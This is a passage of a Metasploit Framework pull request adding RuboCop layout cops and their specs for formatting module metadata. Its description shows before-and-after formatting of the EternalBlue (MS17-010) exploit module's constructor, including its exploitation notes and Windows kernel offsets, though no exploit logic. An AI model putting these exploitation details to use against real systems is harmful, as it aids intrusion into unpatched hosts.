+        private_data: key.private_key.to_s,
+        username: user,
+        workspace_id: myworkspace_id
+      }
+
+      create_credential(credential_data)
     end
   end
 end

--- a/spec/rubocop/cop/layout/module_description_indentation_spec.rb
+++ b/spec/rubocop/cop/layout/module_description_indentation_spec.rb
@@ -1,0 +1,220 @@
+# frozen_string_literal: true
+require 'spec_helper'
+require 'rubocop/cop/layout/module_description_indentation'
+
+RSpec.describe RuboCop::Cop::Layout::ModuleDescriptionIndentation do
+  subject(:cop) { described_class.new(config) }
+  let(:config) do
+    RuboCop::Config.new(
+      'Layout/IndentationWidth' => {
+        'Width' => indentation_width
+      })
+  end
+  let(:indentation_width) { 2 }
+
+  it 'accepts descriptions being on one line being on a new line' do
+    expect_no_offenses(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            update_info(
+              info,
+              'Name'          => 'Simple module name',
+              'Description'   => 'Lorem ipsum dolor sit amet',
+              'Author'        => [ 'example1', 'example2' ],
+              'License'       => MSF_LICENSE,
+              'Platform'      => 'win',
+              'Arch'          => ARCH_X86,
+            )
+          )
+        end
+      end
+    RUBY
+  end
+
+  it 'accepts descriptions correctly formatted using %q syntax' do
+    expect_no_offenses(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            update_info(
+              info,
+              'Name'           => 'Simple module name',
+              'Description'    => %q{
+                Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque efficitur pulvinar arcu eget ultrices.
+                Vestibulum at risus at nisi convallis laoreet a sed libero. Nam vestibulum euismod dictum. Pellentesque
+                eu nunc vitae mi volutpat viverra in id ipsum. Maecenas fermentum condimentum dapibus.
+              },
+              'Author'        => [
+                'example1',
+                'example2'
+              ],
+              'License'       => MSF_LICENSE,
+              'Platform'      => 'win',
+              'Arch'          => ARCH_X86,
+            )
+          )
+        end
+      end
+    RUBY
+  end
+
+  it 'registers an offense when descriptions are incorrectly indented' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            update_info(
+              info,
+              'Name'           => 'Simple module name',
+              'Description'    => %q(
+            Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque efficitur pulvinar arcu eget ultrices.
+            Vestibulum at risus at nisi convallis laoreet a sed libero. Nam vestibulum euismod dictum. Pellentesque
+            eu nunc vitae mi volutpat viverra in id ipsum. Maecenas fermentum condimentum dapibus.
+            ),
+            ^ Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
+              'Author'        => [
+                'example1',
+                'example2'
+              ],
+              'License'       => MSF_LICENSE,
+              'Platform'      => 'win',
+              'Arch'          => ARCH_X86,
+            )
+          )
+        end
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            update_info(
+              info,
+              'Name'           => 'Simple module name',
+              'Description'    => %q{
+                Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque efficitur pulvinar arcu eget ultrices.
+                Vestibulum at risus at nisi convallis laoreet a sed libero. Nam vestibulum euismod dictum. Pellentesque
+                eu nunc vitae mi volutpat viverra in id ipsum. Maecenas fermentum condimentum dapibus.
+              },
+              'Author'        => [
+                'example1',
+                'example2'
+              ],
+              'License'       => MSF_LICENSE,
+              'Platform'      => 'win',
+              'Arch'          => ARCH_X86,
+            )
+          )
+        end
+      end
+    RUBY
+  end
+
+  it 'registers an offense when descriptions are incorrectly indented with the merge_info function' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            merge_info(
+              info,
+              'Name'           => 'Simple module name',
+              'Description'    => %q(
+            Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque efficitur pulvinar arcu eget ultrices.
+            Vestibulum at risus at nisi convallis laoreet a sed libero. Nam vestibulum euismod dictum. Pellentesque
+            eu nunc vitae mi volutpat viverra in id ipsum. Maecenas fermentum condimentum dapibus.
+            ),
+            ^ Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
+              'Author'        => [
+                'example1',
+                'example2'
+              ],
+              'License'       => MSF_LICENSE,
+              'Platform'      => 'win',
+              'Arch'          => ARCH_X86,
+            )
+          )
+        end
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            merge_info(
+              info,
+              'Name'           => 'Simple module name',
+              'Description'    => %q{
+                Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque efficitur pulvinar arcu eget ultrices.
+                Vestibulum at risus at nisi convallis laoreet a sed libero. Nam vestibulum euismod dictum. Pellentesque
+                eu nunc vitae mi volutpat viverra in id ipsum. Maecenas fermentum condimentum dapibus.
+              },
+              'Author'        => [
+                'example1',
+                'example2'
+              ],
+              'License'       => MSF_LICENSE,
+              'Platform'      => 'win',
+              'Arch'          => ARCH_X86,
+            )
+          )
+        end
+      end
+    RUBY
+  end
+
+  it 'registers an offense when the wrong literal type is used' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            update_info(
+              info,
+              'Name'           => 'Simple module name',
+              'Description'    => %Q(
+                Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque efficitur pulvinar arcu eget ultrices.
+                Vestibulum at risus at nisi convallis laoreet a sed libero. Nam vestibulum euismod dictum. Pellentesque
+                eu nunc vitae mi volutpat viverra in id ipsum. Maecenas fermentum condimentum dapibus.
+              ),
+              ^ Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
+              'Author'        => [
+                'example1',
+                'example2'
+              ],
+              'License'       => MSF_LICENSE,
+              'Platform'      => 'win',
+              'Arch'          => ARCH_X86,
+            )
+          )
+        end
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            update_info(
+              info,
+              'Name'           => 'Simple module name',
+              'Description'    => %q{
+                Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque efficitur pulvinar arcu eget ultrices.
+                Vestibulum at risus at nisi convallis laoreet a sed libero. Nam vestibulum euismod dictum. Pellentesque
+                eu nunc vitae mi volutpat viverra in id ipsum. Maecenas fermentum condimentum dapibus.
+              },
+              'Author'        => [
+                'example1',
+                'example2'
+              ],
+              'License'       => MSF_LICENSE,
+              'Platform'      => 'win',
+              'Arch'          => ARCH_X86,
+            )
+          )
+        end
+      end
+    RUBY
+  end
+end

--- a/spec/rubocop/cop/layout/module_hash_on_new_line_spec.rb
+++ b/spec/rubocop/cop/layout/module_hash_on_new_line_spec.rb
@@ -1,0 +1,216 @@
+# frozen_string_literal: true
+require 'spec_helper'
+require 'rubocop/cop/layout/module_hash_on_new_line'
+
+RSpec.describe RuboCop::Cop::Layout::ModuleHashOnNewLine do
+  subject(:cop) { described_class.new(config) }
+  let(:config) do
+    RuboCop::Config.new(
+      'Layout/IndentationWidth' => {
+        'Width' => indentation_width
+      })
+  end
+  let(:indentation_width) { 2 }
+
+  it 'accepts update_info being on a new line' do
+    expect_no_offenses(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            update_info(
+              info,
+              'Name'          => 'Simple module name',
+              'Description'   => 'Lorem ipsum dolor sit amet',
+              'Author'        => [ 'example1', 'example2' ],
+              'License'       => MSF_LICENSE,
+              'Platform'      => 'win',
+              'Arch'          => ARCH_X86,
+            )
+          )
+        end
+      end
+    RUBY
+  end
+
+  it 'registers an offence when update_info is not on its own line' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(update_info(info,
+                            ^^^^ info should start on its own line
+                           ^ update_info should start on its own line
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        => [ 'example1', 'example2' ],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            ))
+            ^ A new line is missing
+        end
+      end
+    RUBY
+  end
+
+  it 'still registers offenses if register_options is present' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(update_info(info,
+                            ^^^^ info should start on its own line
+                           ^ update_info should start on its own line
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        => [ 'example1', 'example2' ],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            ))
+            ^ A new line is missing
+            register_options([])
+        end
+      end
+    RUBY
+  end
+
+  it 'reports only one error if info is already on its own line' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(update_info(
+                           ^ update_info should start on its own line
+                info,
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        => [ 'example1', 'example2' ],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            )
+          )
+          register_options([])
+        end
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            update_info(
+                info,
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        => [ 'example1', 'example2' ],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            )
+          )
+          register_options([])
+        end
+      end
+    RUBY
+  end
+
+  it 'ensures merge_info functions are on their own lines' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(merge_info(
+                          ^ merge_info should start on its own line
+                info,
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        => [ 'example1', 'example2' ],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            )
+          )
+          register_options([])
+        end
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+            merge_info(
+                info,
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        => [ 'example1', 'example2' ],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            )
+          )
+          register_options([])
+        end
+      end
+    RUBY
+  end
+
+  it 'reports an error if update_info and info are on the same line' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+              update_info(info,
+                          ^^^^ info should start on its own line
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        => [ 'example1', 'example2' ],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            ))
+            ^ A new line is missing
+          register_options([])
+        end
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(
+              update_info(
+                info,
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        => [ 'example1', 'example2' ],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            )
+          )
+          register_options([])
+        end
+      end
+    RUBY
+  end
+
+  it 'still registers offenses if register_options is present' do
+    expect_offense(<<~RUBY)
+      class DummyModule
+        def initialize(info = {})
+          super(update_info(info,
+                            ^^^^ info should start on its own line
+                           ^ update_info should start on its own line
+            'Name'          => 'Simple module name',
+            'Description'   => 'Lorem ipsum dolor sit amet',
+            'Author'        => [ 'example1', 'example2' ],
+            'License'       => MSF_LICENSE,
+            'Platform'      => 'win',
+            'Arch'          => ARCH_X86,
+            ))
+            ^ A new line is missing
+          register_options([])
+        end
+      end
+    RUBY
+  end
+end

--- a/spec/spec_helper.rb
+++ b/spec/spec_helper.rb
@@ -11,7 +11,7 @@ require File.expand_path('../../config/rails_bigdecimal_fix', __FILE__)
 #
 # Must be explicit as activerecord is optional dependency
 require 'active_record/railtie'
-
+require 'rubocop/rspec/support'
 require 'metasploit/framework/database'
 # check if database.yml is present
 unless Metasploit::Framework::Database.configurations_pathname.try(:to_path)
@@ -44,7 +44,7 @@ end
 
 RSpec.configure do |config|
   config.raise_errors_for_deprecations!
-
+  config.include RuboCop::RSpec::ExpectOffense
   config.expose_dsl_globally = false
 
   # These two settings work together to allow you to limit a spec run


### PR DESCRIPTION
### [Useful: View PR changes with `--ignore-all-space` flag](https://github.com/rapid7/metasploit-framework/pull/12990/files?w=1)

This PR has two commits:

- First - Adding custom rubocop rules to ensure:
    - A new line before `update_info` within a module's constructor
    - Forces all of its arguments to be on new lines
    - A new line exists after `update_info(...)` to avoid `))` at the end of the `super(update_info` call
- Second - Running `rubocop -a` on the specific files within the codebase as an example. This commit doesn't have to land, as it might cause issues for inflight PRs.

These custom rubocops are a pre-requisite for the super-hash to be formatted nicely.

### Differences

#### Before

Without this rule: https://github.com/rapid7/metasploit-framework/issues/11542#issuecomment-589362666

```ruby
  def initialize(info = {})
    super(update_info(info,
                      'Name'           => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
                      'Description'    => %q(
        This module is a port of the Equation Group ETERNALBLUE exploit, part of
        the FuzzBunch toolkit released by Shadow Brokers.

        There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size
        is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a
        DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow
        is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
        completed in srvnet!SrvNetWskReceiveComplete.

        This exploit, like the original may not trigger 100% of the time, and should be
        run continuously until triggered. It seems like the pool will get hot streaks
        and need a cool down period before the shells rain in again.

        The module will attempt to use Anonymous login, by default, to authenticate to perform the
        exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use
        those instead.

        On some systems, this module may cause system instability and crashes, such as a BSOD or
        a reboot. This may be more likely with some payloads.
      ),

                      'Author' =>
                      [
                        'Sean Dillon <sean.dillon@risksense.com>',  # @zerosum0x0
                        'Dylan Davis <dylan.davis@risksense.com>',  # @jennamagius
                        'Equation Group',
                        'Shadow Brokers',
                        'thelightcosine' # RubySMB refactor and Fallback Credential mode
                      ],
                      'License'        => MSF_LICENSE,
                      'References'     =>
                        [
                          ['MSB', 'MS17-010'],
                          ['CVE', '2017-0143'],
                          ['CVE', '2017-0144'],
                          ['CVE', '2017-0145'],
                          ['CVE', '2017-0146'],
                          ['CVE', '2017-0147'],
                          ['CVE', '2017-0148'],
                          ['URL', 'https://github.com/RiskSense-Ops/MS17-010']
                        ],
                      'DefaultOptions' =>
                        {
                          'EXITFUNC' => 'thread',
                          'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',
                          'WfsDelay' => 5
                        },
                      'Privileged'     => true,
                      'Payload'        =>
                        {
                          'Space'        => 2000, # this can be more, needs to be recalculated
                          'EncoderType'  => Msf::Encoder::Type::Raw
                        },
                      'Platform'       => 'win',
                      'Targets'        =>
                        [
                          [
                            'Windows 7 and Server 2008 R2 (x64) All Service Packs',
                            {
                              'Platform'       => 'win',
                              'Arch'           => [ARCH_X64],
                              'os_patterns'    => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],
                              'ep_thl_b'       => 0x308,  # EPROCESS.ThreadListHead.Blink offset
                              'et_alertable'   => 0x4c,   # ETHREAD.Alertable offset
                              'teb_acp'        => 0x2c8,  # TEB.ActivationContextPointer offset
                              'et_tle'         => 0x420   # ETHREAD.ThreadListEntry offset
                            }
                          ]
                        ],
                      'DefaultTarget'  => 0,
                      'DisclosureDate' => 'Mar 14 2017',
                      'Notes'          =>
                        {
                          'AKA' => ['ETERNALBLUE']
                        }))
```

#### After

With this rule: https://github.com/rapid7/metasploit-framework/issues/11542#issuecomment-589386059

```ruby
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
        'Description'    => %q(
        This module is a port of the Equation Group ETERNALBLUE exploit, part of
        the FuzzBunch toolkit released by Shadow Brokers.

        There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size
        is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a
        DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow
        is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
        completed in srvnet!SrvNetWskReceiveComplete.

        This exploit, like the original may not trigger 100% of the time, and should be
        run continuously until triggered. It seems like the pool will get hot streaks
        and need a cool down period before the shells rain in again.

        The module will attempt to use Anonymous login, by default, to authenticate to perform the
        exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use
        those instead.

        On some systems, this module may cause system instability and crashes, such as a BSOD or
        a reboot. This may be more likely with some payloads.
      ),

        'Author' =>
        [
          'Sean Dillon <sean.dillon@risksense.com>',  # @zerosum0x0
          'Dylan Davis <dylan.davis@risksense.com>',  # @jennamagius
          'Equation Group',
          'Shadow Brokers',
          'thelightcosine' # RubySMB refactor and Fallback Credential mode
        ],
        'License'        => MSF_LICENSE,
        'References'     =>
          [
            ['MSB', 'MS17-010'],
            ['CVE', '2017-0143'],
            ['CVE', '2017-0144'],
            ['CVE', '2017-0145'],
            ['CVE', '2017-0146'],
            ['CVE', '2017-0147'],
            ['CVE', '2017-0148'],
            ['URL', 'https://github.com/RiskSense-Ops/MS17-010']
          ],
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread',
            'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',
            'WfsDelay' => 5
          },
        'Privileged'     => true,
        'Payload'        =>
          {
            'Space'        => 2000, # this can be more, needs to be recalculated
            'EncoderType'  => Msf::Encoder::Type::Raw
          },
        'Platform'       => 'win',
        'Targets'        =>
          [
            [
              'Windows 7 and Server 2008 R2 (x64) All Service Packs',
              {
                'Platform'       => 'win',
                'Arch'           => [ARCH_X64],
                'os_patterns'    => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],
                'ep_thl_b'       => 0x308,  # EPROCESS.ThreadListHead.Blink offset
                'et_alertable'   => 0x4c,   # ETHREAD.Alertable offset
                'teb_acp'        => 0x2c8,  # TEB.ActivationContextPointer offset
                'et_tle'         => 0x420   # ETHREAD.ThreadListEntry offset
              }
            ]
          ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => 'Mar 14 2017',
        'Notes'          =>
          {
            'AKA' => ['ETERNALBLUE']
          }
      )
    )
```
